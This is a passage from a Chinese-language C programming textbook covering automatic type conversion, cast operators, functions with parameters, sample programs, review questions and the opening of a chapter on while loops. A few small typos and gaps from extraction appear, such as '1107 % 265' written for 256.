int比long的级别高。之所以short和char类 型没有列出,是因为它们已经被升级到int或unsigned int。 4.在赋值表达式语句中,计算的最终结果会被转换成被赋值变量的类 型。这个过程可能导致类型升级或降级(demotion)。所谓降级,是指把一 种类型转换成更低级别的类型。 5.当作为函数参数传递时,char和short被转换成int,float被转换成 double。第9章将介绍,函数原型会覆盖自动升级。 类型升级通常都不会有什么问题,但是类型降级会导致真正的麻烦。原 因很简单:较低类型可能放不下整个数字。例如,一个8位的char类型变量 储存整数101没问题,但是存不下22334。 287 如果待转换的值与目标类型不匹配怎么办?这取决于转换涉及的类型。 待赋值的值与目标类型不匹配时,规则如下。 1.目标类型是无符号整型,且待赋的值是整数时,额外的位将被忽略。 例如,如果目标类型是 8 位unsigned char,待赋的值是原始值求模256。 2.如果目标类型是一个有符号整型,且待赋的值是整数,结果因实现而 异。 3.如果目标类型是一个整型,且待赋的值是浮点数,该行为是未定义 的。 如果把一个浮点值转换成整数类型会怎样?当浮点类型被降级为整数类 型时,原来的浮点值会被截断。例如,23.12和23.99都会被截断为23,-23.5 会被截断为-23。 程序清单5.14演示了这些规则。 程序清单5.14 convert.c程序 /* convert.c -- 自动类型转换 */ #include <stdio.h> int main(void) { char ch; int i; float fl; fl = i = ch = 'C';                  /* 第9行 */ 288 printf("ch = 
%c, i = %d, fl = %2.2f\n", ch, i, fl); /* 第10行 */ ch = ch + 1;                     /* 第11行 */ i = fl + 2 * ch;                   /* 第12行 */ fl = 2.0 * ch + i;                  /* 第13行 */ printf("ch = %c, i = %d, fl = %2.2f\n", ch, i, fl); /* 第14行 */ ch = 1107;                      /* 第15行 */ printf("Now ch = %c\n", ch);             /* 第16行 */ ch = 80.89;                     /* 第17行 */ printf("Now ch = %c\n", ch);             /* 第18行 */ return 0; } 运行convert.c后输出如下: ch = C, i = 67, fl = 67.00 ch = D, i = 203, fl = 339.00 Now ch = S Now ch = P 在我们的系统中,char是8位,int是32位。程序的分析如下。 第9行和第10行:字符'C'被作为1字节的ASCII值储存在ch中。整数变量i 接受由'C'转换的整数,即按4字节储存67。最后,fl接受由67转换的浮点数 67.00。 289 第11行和第14行:字符变量'C'被转换成整数67,然后加1。计算结果是4 字节整数68,被截断成1字节储存在ch中。根据%c转换说明打印时,68被解 释成'D'的ASCII码。 第12行和第14行:ch的值被转换成4字节的整数(68),然后2乘以ch。 为了和fl相加,乘积整数(136)被转换成浮点数。计算结果(203.00f)被 转换成int类型,并储存在i中。 第13行和第14行:ch的值('D',或68)被转换成浮点数,然后2乘以 ch。为了做加法,i的值(203)被转换为浮点类型。计算结果(339.00)被 储存在fl中。 第15行和第16行:演示了类型降级的示例。把ch设置为一个超出其类型 范围的值,忽略额外的位后,最终ch的值是字符S的ASCII码。或者,更确切 地说,ch的值是1107 % 265,即83。 第17行和第18行:演示了另一个类型降级的示例。把ch设置为一个浮点 数,发生截断后,ch的值是字符P的ASCII码。 5.5.1 强制类型转换运算符 通常,应该避免自动类型转换,尤其是类型降级。但是如果能小心使 用,类型转换也很方便。我们前面讨论的类型转换都是自动完成的。然而, 有时需要进行精确的类型转换,或者在程序中表明类型转换的意图。这种情 况下要用到强制类型转换(cast),即在某个量的前面放置用圆括号括起来 的类型名,该类型名即是希望转换成的目标类型。圆括号和它括起来的类型 名构成了强制类型转换运算符(cast operator),其通用形式是: (type) 用实际需要的类型(如,long)替换type即可。 考虑下面两行代码,其中mice是int类型的变量。第2行包含两次int强制 类型转换。 290 mice = 1.6 + 1.7; mice = (int)1.6 + (int)1.7; 第1 行使用自动类型转换。首先,1.6和1.7相加得3.3。然后,为了匹配 int 类型的变量,3.3被类型转换截断为整数3。第2行,1.6和1.7在相加之前都 被转换成整数(1),所以把1+1的和赋给变量mice。本质上,两种类型转换 都好不到哪里去,要考虑程序的具体情况再做取舍。 一般而言,不应该混合使用类型(因此有些语言直接不允许这样做), 但是偶尔这样做也是有用的。C语言的原则是避免给程序员设置障碍,但是 程序员必须承担使用的风险和责任。 总结 C的一些运算符 下面是我们学过的一些运算符。 赋值运算符: = 将其右侧的值赋给左侧的变量 算术运算符: +    将其左侧的值与右侧的值相加 -    将其左侧的值减去右侧的值 -    作为一元运算符,改变其右侧值的符号 *    将其左侧的值乘以右侧的值 /    将其左侧的值除以右侧的值,如果两数都是整数,计算结果 将被截断 %    当其左侧的值除以右侧的值时,取其余数(只能应用于整 数) 291 ++    对其右侧的值加1(前缀模式),或对其左侧的值加1(后缀 模式) --    对其右侧的值减1(前缀模式),或对其左侧的值减1(后缀模 式) 其他运算符: sizeof    获得其右侧运算对象的大小(以字节为单位),运算对象 可以是一个被圆括号括起来的类型说明符,如sizeof(float),或者是一个具体 的变量名、数组名等,如sizeof foo (类型名)   强制类型转换运算符将其右侧的值转换成圆括号中指定 的类型,如(float)9把整数9转换成浮点数9.0 292 5.6 带参数的函数 现在,相信读者已经熟悉了带参数的函数。要掌握函数,还要学习如何 编写自己的函数(在此之前,读者可能要复习一下程序清单2.3中的butler() 函数,该函数不带任何参数)。程序清单5.15中有一个pound()函数,打印指 定数量的#号(该符号也叫作编号符号或井号)。该程序还演示了类型转换 的应用。 程序清单5.15 pound.c程序 /* pound.c -- 定义一个带一个参数的函数 */ #include <stdio.h> void pound(int n);// ANSI函数原型声明 int main(void) { int times = 5; char ch = '!';   // ASCII码是33 float f = 6.0f; pound(times);   // int类型的参数 pound(ch);     // 和pound((int)ch);相同 pound(f);      // 和pound((int)f);相同 return 0; } 293 void pound(int n)   // ANSI风格函数头 {             // 表明该函数接受一个int类型的参数 while (n-- > 0) printf("#"); printf("\n"); } 运行该程序后,输出如下: ##### ################################# ###### 首先,看程序的函数头: void pound(int n) 如果函数不接受任何参数,函数头的圆括号中应该写上关键字 void。 由于该函数接受一个 int 类型的参数,所以圆括号中包含一个int类型变量n的 声明。参数名应遵循C语言的命名规则。 声明参数就创建了被称为形式参数(formal argument或formal parameter,简称形参)的变量。该例中,形式参数是 int 类型的变量 n。像 pound(10)这样的函数调用会把 10 赋给 n。在该程序中,调用pound(times)就 是把 times 的值(5)赋给 n。我们称函数调用传递的值为实际参数(actual argument或actual parameter),简称实参。所以,函数调用pound(10)把实际 参数10传递给函数,然后该函数把10赋给形式参数(变量n)。也就是说, main()中的变量times的值被拷贝给pound()中的新变量n。 294 注意 实参和形参 在英文中,argument和parameter经常可以互换使用,但是C99标准规定 了:对于actual argument或actual parameter使用术语argument(译为实参); 对于formal argument或formal parameter使用术语parameter(译为形参)。为 遵循这一规定,我们可以说形参是变量,实参是函数调用提供的值,实参被 赋给相应的形参。因此,在程序清单5.15中,times是pound()的实参,n是 pound()的形参。类似地,在函数调用pound(times + 4)中,表达式times + 4的 值是该函数的实参。 变量名是函数私有的,即在函数中定义的函数名不会和别处的相同名称 
发生冲突。如果在pound()中用times代替n,那么这个times与main()中的times 不同。也就是说,程序中出现了两个同名的变量,但是程序可以区分它们。 现在,我们来学习函数调用。第1 个函数调用是pound(times),times的 值5被赋给n。因此, printf()函数打印了5个井号和1个换行符。第2个函数调 用是pound(ch)。这里,ch是char类型,被初始化为!字符,在ASCII中ch的数 值是33。但是pound()函数的参数类型是int,与char不匹配。程序开头的函数 原型在这里发挥了作用。原型(prototype)即是函数的声明,描述了函数的 返回值和参数。pound()函数的原型说明了两点: 该函数没有返回值(函数名前面有void关键字); 该函数有一个int类型的参数。 该例中,函数原型告诉编译器pound()需要一个int类型的参数。相应 地,当编译器执行到pound(ch)表达式时,会把参数ch自动转换成int类型。在 我们的系统中,该参数从1字节的33变成4字节的33,所以现在33的类型满足 函数的要求。与此类似,最后一次调用是pound(f),使得float类型的变量被 转换成合适的类型。 在ANSI C之前,C使用的是函数声明,而不是函数原型。函数声明只指 明了函数名和返回类型,没有指明参数类型。为了向下兼容,C现在仍然允 295 许这样的形式: void pound(); /* ANSI C乊前的函数声明 */ 如果用这条函数声明代替pound.c程序中的函数原型会怎样?第 1 次函 数调用,pound(times)没问题,因为times是int类型。第2次函数调用, pound(ch)也没问题,因为即使缺少函数原型,C也会把char和short类型自动 升级为int类型。第3次函数调用,pound(f)会失败,因为缺少函数原型,float 会被自动升级为 double,这没什么用。虽然程序仍然能运行,但是输出的内 容不正确。在函数调用中显式使用强制类型转换,可以修复这个问题: pound ((int)f); // 把f强制类型转换为正确的类型 注意,如果f的值太大,超过了int类型表示的范围,这样做也不行。 296 5.7 示例程序 程序清单5.16演示了本章介绍的几个概念,这个程序对某些人很有用。 程序看起来很长,但是所有的计算都在程序的后面几行中。我们尽量使用大 量的注释,让程序看上去清晰明了。请通读该程序,稍后我们会分析几处要 点。 程序清单5.16 running.c程序 // running.c -- A useful program for runners #include <stdio.h> const int S_PER_M = 60;        // 1分钟的秒数 const int S_PER_H = 3600;      // 1小时的分钟数 const double M_PER_K = 0.62137;   // 1公里的英里数 int main(void) { double distk, distm;  // 跑过的距离(分别以公里和英里为单位) double rate;       // 平均速度(以英里/小时为单位) int min, sec;      // 跑步用时(以分钟和秒为单位) int time;        // 跑步用时(以秒为单位) double mtime;      // 跑1英里需要的时间,以秒为单位 int mmin, msec;     // 跑1英里需要的时间,以分钟和秒为单位 printf("This program converts your time for a metric race\n"); 297 printf("to a time for running a mile and to your average\n"); printf("speed in miles per hour.\n"); printf("Please enter, in kilometers, the distance run.\n"); scanf("%lf", &distk);      // %lf表示读取一个double类型的值 printf("Next enter the time in minutes and seconds.\n"); printf("Begin by entering the minutes.\n"); scanf("%d", &min); printf("Now enter the seconds.\n"); scanf("%d", &sec); time = S_PER_M * min + sec;   // 把时间转换成秒 distm = M_PER_K * distk;    // 把公里转换成英里 rate = distm / time * S_PER_H; // 英里/秒×秒/小时 = 英里/小时 mtime = (double) time / distm; // 时间/距离 = 跑1英里所用的时间 mmin = (int) mtime / S_PER_M;  // 求出分钟数 msec = (int) mtime % S_PER_M;  // 求出剩余的秒数 printf("You ran %1.2f km (%1.2f miles) in %d min, %d  sec.\n", distk, distm, min, sec); printf("That pace corresponds to running a mile in %d  min, ", 298 mmin); printf("%d sec.\nYour average speed was %1.2f mph.\n", msec, rate); return 0; } 程序清单5.16使用了min_sec程序(程序清单5.9)中的方法把时间转换 成分钟和秒,除此之外还使用了类型转换。为什么要进行类型转换?因为程 序在秒转换成分钟的部分需要整型参数,但是在公里转换成英里的部分需要 浮点运算。我们使用强制类型转换运算符进行了显式转换。 实际上,我们曾经利用自动类型转换编写这个程序,即使用int类型的 mtime来强制时间计算转换成整数形式。但是,在测试的11个系统中,这个 版本的程序在1个系统上无法运行,这是由于编译器(版本比较老)没有遵 循C规则。而使用强制类型转换就没有问题。对读者而言,强制类型转换强 调了转换类型的意图,对编译器而言也是如此。 下面是程序清单5.16的输出示例: This program converts your time for a metric race to a time for running a mile and to your average speed in miles per hour. Please enter, in kilometers, the distance run. 10.0 Next enter the time in minutes and seconds. Begin by entering the minutes. 299 36 Now enter the seconds. 23 You ran 10.00 km (6.21 miles) in 36 min, 23 sec. That pace corresponds to running a mile in 5 min, 51 sec. Your average speed was 10.25 mph. 
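顺带补充一点:程序清单5.16中 msec = (int) mtime % S_PER_M; 里的强制类型转换不只是表明意图。%运算符要求两个运算对象都是整数,如果不先把double类型的mtime转换成int,这条语句根本无法通过编译。下面是一个简化的示意片段,其中mtime的取值只是假设的例子(大致相当于上面示例中跑1英里所用的时间):

/* mod_cast.c -- 演示%运算符要求整数运算对象(示意片段) */
#include <stdio.h>
int main(void)
{
    const int S_PER_M = 60;
    double mtime = 351.3;          // 假设:跑1英里用时约351.3秒
    int mmin, msec;

    // msec = mtime % S_PER_M;     // 错误:%不能用于double类型的运算对象
    mmin = (int) mtime / S_PER_M;  // 351 / 60,得5
    msec = (int) mtime % S_PER_M;  // 351 % 60,得51
    printf("%d min, %d sec\n", mmin, msec);

    return 0;
}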
300 5.8 关键概念 C 通过运算符提供多种操作。每个运算符的特性包括运算对象的数量、 优先级和结合律。当两个运算符共享一个运算对象时,优先级和结合律决定 了先进行哪项运算。每个 C表达式都有一个值。如果不了解运算符的优先级 和结合律,写出的表达式可能不合法或者表达式的值与预期不符。这会影响 你成为一名优秀的程序员。 虽然C允许编写混合数值类型的表达式,但是算术运算要求运算对象都 是相同的类型。因此,C会进行自动类型转换。尽管如此,不要养成依赖自 动类型转换的习惯,应该显式选择合适的类型或使用强制类型转换。这样, 就不用担心出现不必要的自动类型转换。 301 5.9 本章小结 C 语言有许多运算符,如本章讨论的赋值运算符和算术运算符。一般而 言,运算符需要一个或多个运算对象才能完成运算生成一个值。只需要一个 运算对象的运算符(如负号和 sizeof)称为一元运算符,需要两个运算对象 的运算符(如加法运算符和乘法运算符)称为二元运算符。 表达式由运算符和运算对象组成。在C语言中,每个表达式都有一个 值,包括赋值表达式和比较表达式。运算符优先级规则决定了表达式中各项 的求值顺序。当两个运算符共享一个运算对象时,先进行优先级高的运算。 如果运算符的优先级相等,由结合律(从左往右或从右往左)决定求值顺 序。 大部分语句都以分号结尾。最常用的语句是表达式语句。用花括号括起 来的一条或多条语句构成了复合语句(或称为块)。while语句是一种迭代 语句,只要测试条件为真,就重复执行循环体中的语句。 在C语言中,许多类型转换都是自动进行的。当char和short类型出现在 表达式里或作为函数的参数(函数原型除外)时,都会被升级为int类型; float类型在函数参数中时,会被升级为double类型。在K&R C(不是ANSI C)下,表达式中的float也会被升级为double类型。当把一种类型的值赋给 另一种类型的变量时,值将被转换成与变量的类型相同。当把较大类型转换 成较小类型时(如,long转换成short,或 double 转换成 float),可能会丢失 数据。根据本章介绍的规则,在混合类型的运算中,较小类型会被转换成较 大类型。 定义带一个参数的函数时,便在函数定义中声明了一个变量,或称为形 式参数。然后,在函数调用中传入的值会被赋给这个变量。这样,在函数中 就可以使用该值了。 302 5.10 复习题 复习题的参考答案在附录A中。 1.假设所有变量的类型都是int,下列各项变量的值是多少: a.x = (2 + 3) * 6; b.x = (12 + 6)/2*3; c.y = x = (2 + 3)/4; d.y = 3 + 2*(x = 7/2); 2.假设所有变量的类型都是int,下列各项变量的值是多少: a.x = (int)3.8 + 3.3; b.x = (2 + 3) * 10.5; c.x = 3 / 5 * 22.0; d.x = 22.0 * 3 / 5; 3.对下列各表达式求值: a.30.0 / 4.0 * 5.0; b.30.0 / (4.0 * 5.0); c.30 / 4 * 5; d.30 * 5 / 4; e.30 / 4.0 * 5; f.30 / 4 * 5.0; 303 4.请找出下面的程序中的错误。 int main(void) { int i = 1, float n; printf("Watch out! Here come a bunch of fractions!\n"); while (i < 30) n = 1/i; printf(" %f", n); printf("That's all, folks!\n"); return; } 5.这是程序清单 5.9 的另一个版本。从表面上看,该程序只使用了一条 scanf()语句,比程序清单5.9简单。请找出不如原版之处。 #include <stdio.h> #define S_TO_M 60 int main(void) { int sec, min, left; 304 printf("This program converts seconds to minutes and "); printf("seconds.\n"); printf("Just enter the number of seconds.\n"); printf("Enter 0 to end the program.\n"); while (sec > 0) { scanf("%d", &sec); min = sec/S_TO_M; left = sec % S_TO_M; printf("%d sec is %d min, %d sec. \n", sec, min, left); printf("Next input?\n"); } printf("Bye!\n"); return 0; } 6.下面的程序将打印出什么内容? #include <stdio.h> #define FORMAT "%s! C is cool!\n" int main(void) { 305 int num = 10; printf(FORMAT,FORMAT); printf("%d\n", ++num); printf("%d\n", num++); printf("%d\n", num--); printf("%d\n", num); return 0; } 7.下面的程序将打印出什么内容? #include <stdio.h> int main(void) { char c1, c2; int diff; float num; c1 = 'S'; c2 = 'O'; diff = c1 - c2; num = diff; 306 printf("%c%c%c:%d %3.2f\n", c1, c2, c1, diff, num); return 0; } 8.下面的程序将打印出什么内容? #include <stdio.h> #define TEN 10 int main(void) { int n = 0; while (n++ < TEN) printf("%5d", n); printf("\n"); return 0; } 9.修改上一个程序,使其可以打印字母a~g。 10.假设下面是完整程序中的一部分,它们分别打印什么? a. int x = 0; while (++x < 3) 307 printf("%4d", x); b. int x = 100; while (x++ < 103) printf("%4d\n",x); printf("%4d\n",x); c. char ch = 's'; while (ch < 'w') { printf("%c", ch); ch++; } printf("%c\n",ch); 11.下面的程序会打印出什么? 
#define MESG "COMPUTER BYTES DOG" #include <stdio.h> int main(void) { 308 int n = 0; while ( n < 5 ) printf("%s\n", MESG); n++; printf("That's all.\n"); return 0; } 12.分别编写一条语句,完成下列各任务(或者说,使其具有以下副作 用): a.将变量x的值增加10 b.将变量x的值增加1 c.将a与b之和的两倍赋给c d.将a与b的两倍之和赋给c 13.分别编写一条语句,完成下列各任务: a.将变量x的值减少1 b.将n除以k的余数赋给m c.q除以b减去a,并将结果赋给p d.a与b之和除以c与d的乘积,并将结果赋给x 309 5.11 编程练习 1.编写一个程序,把用分钟表示的时间转换成用小时和分钟表示的时 间。使用#define或const创建一个表示60的符号常量或const变量。通过while 循环让用户重复输入值,直到用户输入小于或等于0的值才停止循环。 2.编写一个程序,提示用户输入一个整数,然后打印从该数到比该数大 10的所有整数(例如,用户输入5,则打印5~15的所有整数,包括5和 15)。要求打印的各值之间用一个空格、制表符或换行符分开。 3.编写一个程序,提示用户输入天数,然后将其转换成周数和天数。例 如,用户输入18,则转换成2周4天。以下面的格式显示结果: 18 days are 2 weeks, 4 days. 通过while循环让用户重复输入天数,当用户输入一个非正值时(如0 或-20),循环结束。 4.编写一个程序,提示用户输入一个身高(单位:厘米),并分别以厘 米和英寸为单位显示该值,允许有小数部分。程序应该能让用户重复输入身 高,直到用户输入一个非正值。其输出示例如下: Enter a height in centimeters: 182 182.0 cm = 5 feet, 11.7 inches Enter a height in centimeters (<=0 to quit): 168.7 168.0 cm = 5 feet, 6.4 inches Enter a height in centimeters (<=0 to quit): 0 bye 5.修改程序addemup.c(程序清单5.13),你可以认为addemup.c是计算20 310 天里赚多少钱的程序(假设第1天赚$1、第2天赚$2、第3天赚$3,以此类 推)。修改程序,使其可以与用户交互,根据用户输入的数进行计算(即, 用读入的一个变量来代替20)。 6.修改编程练习5的程序,使其能计算整数的平方和(可以认为第1天赚 $1、第2天赚$4、第3天赚$9,以此类推,这看起来很不错)。C没有平方函 数,但是可以用n * n来表示n的平方。 7.编写一个程序,提示用户输入一个double类型的数,并打印该数的立 方值。自己设计一个函数计算并打印立方值。main()函数要把用户输入的值 传递给该函数。 8.编写一个程序,显示求模运算的结果。把用户输入的第1个整数作为 求模运算符的第2个运算对象,该数在运算过程中保持不变。用户后面输入 的数是第1个运算对象。当用户输入一个非正值时,程序结束。其输出示例 如下: This program computes moduli. Enter an integer to serve as the second operand: 256 Now enter the first operand: 438 438 % 256 is 182 Enter next number for first operand (<= 0 to quit): 1234567 1234567 % 256 is 135 Enter next number for first operand (<= 0 to quit): 0 Done 9.编写一个程序,要求用户输入一个华氏温度。程序应读取double类型 的值作为温度值,并把该值作为参数传递给一个用户自定义的函数 311 Temperatures()。该函数计算摄氏温度和开氏温度,并以小数点后面两位数字 的精度显示3种温度。要使用不同的温标来表示这3个温度值。下面是华氏温 度转摄氏温度的公式: 摄氏温度 = 5.0 / 9.0 * (华氏温度 - 32.0) 开氏温标常用于科学研究,0表示绝对零,代表最低的温度。下面是摄 氏温度转开氏温度的公式: 开氏温度 = 摄氏温度 + 273.16 Temperatures()函数中用const创建温度转换中使用的变量。在main()函数 中使用一个循环让用户重复输入温度,当用户输入 q 或其他非数字时,循环 结束。scanf()函数返回读取数据的数量,所以如果读取数字则返回1,如果 读取q则不返回1。可以使用==运算符将scanf()的返回值和1作比较,测试两 值是否相等。 [1].根据C标准,声明不是语句。这与C++有所不同。——译者注 [2].在C语言中,赋值和函数调用都是表达式。没有所谓的“赋值语句”和“函 数调用语句”,这些语句实际上都是表达式语句。本书将“assignment statement”均译为“赋值表达式语句”,以提醒读者注意。——译者注 312 第6章 C控制语句:循环 本章介绍以下内容: 关键字:for、while、do while 运算符:<、>、>=、<=、!=、==、+=、*=、-=、/=、%= 函数:fabs() C语言有3种循环:for、while、do while 使用关系运算符构建控制循环的表达式 其他运算符 循环常用的数组 编写有返回值的函数 大多数人都希望自己是体格强健、天资聪颖、多才多艺的能人。虽然有 时事与愿违,但至少我们用 C能写出这样的程序。诀窍是控制程序流。对于 计算机科学(是研究计算机,不是用计算机做研究)而言,一门语言应该提 供以下3种形式的程序流: 执行语句序列; 如果满足某些条件就重复执行语句序列(循环 通过测试选择执行哪一个语句序列(分支)。 读者对第一种形式应该很熟悉,前面学过的程序中大部分都是由语句序 列组成。while循环属于第二种形式。本章将详细讲解while循环和其他两种 循环:for和do while。第三种形式用于在不同的执行方案之间进行选择,让 313 程序更“智能”,且极大地提高了计算机的用途。不过,要等到下一章才介绍 这部分的内容。本章还将介绍数组,可以把新学的知识应用在数组上。另 外,本章还将继续介绍函数的相关内容。首先,我们从while循环开始学 习。 314 6.1 再探while循环 经过上一章的学习,读者已经熟悉了 while 循环。这里,我们用一个程 序来回顾一下,程序清单 6.1根据用户从键盘输入的整数进行求和。程序利 用了scanf()的返回值来结束循环。 程序清单6.1 summing.c程序 /* summing.c -- 根据用户键入的整数求和 */ #include <stdio.h> int main(void) { long num; long sum = 0L;     /* 把sum初始化为0 */ int status; printf("Please enter an integer to be summed "); printf("(q to quit): "); status = scanf("%ld", &num); while (status == 1)  /* == 的意思是“等于” */ { sum = sum + num; printf("Please enter next integer (q to quit): "); 315 status = scanf("%ld", &num); } printf("Those integers sum to %ld.\n", sum); return 0; } 该程序使用long类型以储存更大的整数。尽管C编译器会把0自动转换为 合适的类型,但是为了保持程序的一致性,我们把sum初始化为0L(long类 型的0),而不是0(int类型的0)。 该程序的运行示例如下: Please enter an integer to be summed (q to quit): 44 Please enter next integer (q to 
quit): 33 Please enter next integer (q to quit): 88 Please enter next integer (q to quit): 121 Please enter next integer (q to quit): q Those integers sum to 286. 6.1.1 程序注释 先看while循环,该循环的测试条件是如下表达式: status == 1 ==运算符是C的相等运算符(equality operator),该表达式判断status是 否等于1。不要把status== 1与status = 1混淆,后者是把1赋给status。根据测试 316 条件status == 1,只要status等于1,循环就会重复。每次循环,num的当前值 都被加到sum上,这样sum的值始终是当前整数之和。当status的值不为1时, 循环结束。然后程序打印sum的最终值。 要让程序正常运行,每次循环都要获取num的一个新值,并重置status。 程序利用scanf()的两个不同的特性来完成。首先,使用scanf()读取num的一 个新值;然后,检查scanf()的返回值判断是否成功获取值。第4章中介绍 过,scanf()返回成功读取项的数量。如果scanf()成功读取一个整数,就把该 数存入num并返回1,随后返回值将被赋给status(注意,用户输入的值储存 在num中,不是status中)。这样做同时更新了num和status的值,while循环进 入下一次迭代。如果用户输入的不是数字(如, q),scanf()会读取失败并 返回0。此时,status的值就是0,循环结束。因为输入的字符q不是数字,所 以它会被放回输入队列中(实际上,不仅仅是 q,任何非数值的数据都会导 致循环终止,但是提示用户输入q退出程序比提示用户输入一个非数字字符 要简单)。 如果 scanf()在转换值之前出了问题(例如,检测到文件结尾或遇到硬件 问题),会返回一个特殊值EOF(其值通常被定义为-1)。这个值也会引起 循环终止。 如何告诉循环何时停止?该程序利用 scanf()的双重特性避免了在循环中 交互输入时的这个棘手的问题。例如,假设scanf()没有返回值,那么每次循 环只会改变num的值。虽然可以使用num的值来结束循环,比如把num > 0(num大于0)或num != 0(num不等于0)作为测试条件,但是这样用户就 不能输入某些值,如-3或0。也可以在循环中添加代码,例如每次循环时询 问用户“是否继续循环?<y/n>”,然后判断用户是否输入y。这个方法有些笨 拙,而且还减慢了输入的速度。使用scanf()的返回值,轻松地避免了这些问 题。 现在,我们来看看该程序的结构。总结如下: 把sum初始化为0 317 提示用户输入数据 读取用户输入的数据 当输入的数据为整数时, 输入添加给sum, 提示用户进行输入, 然后读取下一个输入 输入完成后,打印sum的值 顺带一提,这叫作伪代码(pseudocode),是一种用简单的句子表示程 序思路的方法,它与计算机语言的形式相对应。伪代码有助于设计程序的逻 辑。确定程序的逻辑无误之后,再把伪代码翻译成实际的编程代码。使用伪 代码的好处之一是,可以把注意力集中在程序的组织和逻辑上,不用在设计 程序时还要分心如何用编程语言来表达自己的想法。例如,可以用缩进来代 表一块代码,不用考虑C的语法要用花括号把这部分代码括起来。 总之,因为while循环是入口条件循环,程序在进入循环体之前必须获 取输入的数据并检查status的值,所以在 while 前面要有一个 scanf()。要让循 环继续执行,在循环内需要一个读取数据的语句,这样程序才能获取下一个 status的值,所以在while循环末尾还要有一个scanf(),它为下一次迭代做好 了准备。可以把下面的伪代码作为while循环的标准格式: 获得第1个用于测试的值 当测试为真时 处理值 获取下一个值 318 6.1.2 C风格读取循环 根据伪代码的设计思路,程序清单6.1可以用Pascal、BASIC或 FORTRAN来编写。但是C更为简洁,下面的代码: status = scanf("%ld", &num); while (status == 1) { /* 循环行为 */ status = scanf("%ld", &num); } 可以用这些代码替换: while (scanf("%ld", &num) == 1) { /*循环行为*/ } 第二种形式同时使用scanf()的两种不同的特性。首先,如果函数调用成 功,scanf()会把一个值存入num。然后,利用scanf()的返回值(0或1,不是 num的值)控制while循环。因为每次迭代都会判断循环的条件,所以每次迭 代都要调用scanf()读取新的num值来做判断。换句话说,C的语法特性让你可 以用下面的精简版本替换标准版本: 当获取值和判断值都成功 处理该值 319 接下来,我们正式地学习while语句。 320 6.2 while语句 while循环的通用形式如下: while ( expression ) statement statement部分可以是以分号结尾的简单语句,也可以是用花括号括起来 的复合语句。 到目前为止,程序示例中的expression部分都使用关系表达式。也就是 说,expression是值之间的比较,可以使用任何表达式。如果expression为真 (或者更一般地说,非零),执行 statement部分一次,然后再次判断 expression。在expression为假(0)之前,循环的判断和执行一直重复进行。 每次循环都被称为一次迭代(iteration),如图6.1所示。 图6.1 while循环的结构 6.2.1 终止while循环 321 while循环有一点非常重要:在构建while循环时,必须让测试表达式的 值有变化,表达式最终要为假。否则,循环就不会终止(实际上,可以使用 break和if语句来终止循环,但是你尚未学到)。考虑下面的例子: index = 1; while (index < 5) printf("Good morning!\n"); 上面的程序段将打印无数次 。为什么?因为循环中 index的值一直都是原来的值1,不曾变过。现在,考虑下面的程序段: 这段程序也好不到哪里去。虽然改变了index的值,但是改错了!不 过,这个版本至少在index减少到其类型到可容纳的最小负值并变成最大正 值时会终止循环(第3章3.4.2节中的toobig.c程序解释过,最大正值加1一般 会得到一个负值;类似地,最小负值减1一般会得到最大正值)。 6.2.2 何时终止循环 要明确一点:只有在对测试条件求值时,才决定是终止还是继续循环。 例如,考虑程序清单6.2中的程序。 程序清单6.2 when.c程序 // when.c -- 何时退出循环 #include <stdio.h> int main(void) 322 { int n = 5; while (n < 7)           // 第7行 { printf("n = %d\n", n); n++;              // 第10行 printf("Now n = %d\n", n); // 第11行 } printf("The loop has finished.\n"); return 0; } 运行程序清单6.2,输出如下: n = 5 Now n = 6 n = 6 Now n = 7 The loop has finished. 
在第2次循环时,变量n在第10行首次获得值7。但是,此时程序并未退 出,它结束本次循环(第11行),并在对第7行的测试条件求值时才退出循 环(变量n在第1次判断时为5,第2次判断时为6)。 323 6.2.3 while:入口条件循环 while循环是使用入口条件的有条件循环。所谓“有条件”指的是语句部 分的执行取决于测试表达式描述的条件,如(index < 5)。该表达式是一个入 口条件(entry condition),因为必须满足条件才能进入循环体。在下面的情 况中,就不会进入循环体,因为条件一开始就为假: index = 10; while (index++ < 5) printf("Have a fair day or better.\n"); 把第1行改为: index = 3; 就可以运行这个循环了。 6.2.4 语法要点 使用while时,要牢记一点:只有在测试条件后面的单独语句(简单语 句或复合语句)才是循环部分。程序清单6.3演示了忽略这点的后果。缩进 是为了让读者阅读方便,不是计算机的要求。 程序清单6.3 while1.c程序 /* while1.c -- 注意花括号的使用 */ /* 糟糕的代码创建了一个无限循环 */ #include <stdio.h> int main(void) { 324 int n = 0; while (n < 3) printf("n is %d\n", n); n++; printf("That's all this program does\n"); return 0; } 该程序的输出如下: n is 0 n is 0 n is 0 n is 0 n is 0 ... 屏幕上会一直输出以上内容,除非强行关闭这个程序。 虽然程序中缩进了n++;这条语句,但是并未把它和上一条语句括在花括 号内。因此,只有直接跟在测试条件后面的一条语句是循环的一部分。变量 n的值不会改变,条件n < 3一直为真。该循环会一直打印n is 0,除非强行关 闭程序。这是一个无限循环(infinite loop)的例子,没有外部干涉就不会退 出。 325 记住,即使while语句本身使用复合语句,在语句构成上,它也是一条 单独的语句。该语句从while开始执行,到第1个分号结束。在使用了复合语 句的情况下,到右花括号结束。 要注意放置分号的位置。例如,考虑程序清单6.4。 程序清单6.4 while2.c程序 /* while2.c -- 注意分号的位置 */ #include <stdio.h> int main(void) { int n = 0; while (n++ < 3);      /* 第7行 */ printf("n is %d\n", n); /* 第8行 */ printf("That's all this program does.\n"); return 0; } 该程序的输出如下: n is 4 That's all this program does. 如前所述,循环在执行完测试条件后面的第 1 条语句(简单语句或复合 语句)后进入下一轮迭代,直到测试条件为假才会结束。该程序中第7行的 326 测试条件后面直接跟着一个分号,循环在此进入下一轮迭代,因为单独一个 分号被视为一条语句。虽然n的值在每次循环时都递增1,但是第8行的语句 不是循环的一部分,因此只会打印一次循环结束后的n值。 在该例中,测试条件后面的单独分号是空语句(null statement),它什 么也不做。在C语言中,单独的分号表示空语句。有时,程序员会故意使用 带空语句的while语句,因为所有的任务都在测试条件中完成了,不需要在 循环体中做什么。例如,假设你想跳过输入到第1个非空白字符或数字,可 以这样写: while (scanf("%d", &num) == 1) ; /* 跳过整数输入 */ 只要scanf()读取一个整数,就会返回1,循环继续执行。注意,为了提 高代码的可读性,应该让这个分号独占一行,不要直接把它放在测试表达式 同行。这样做一方面让读者更容易看到空语句,一方面也提醒自己和读者空 语句是有意而为之。处理这种情况更好的方法是使用下一章介绍的continue 语句。 327 6.3 用关系运算符和表达式比较大小 while循环经常依赖测试表达式作比较,这样的表达式被称为关系表达 式(relational expression),出现在关系表达式中间的运算符叫做关系运算 符(relational operator)。前面的示例中已经用过一些关系运算符,表 6.1 列出了 C 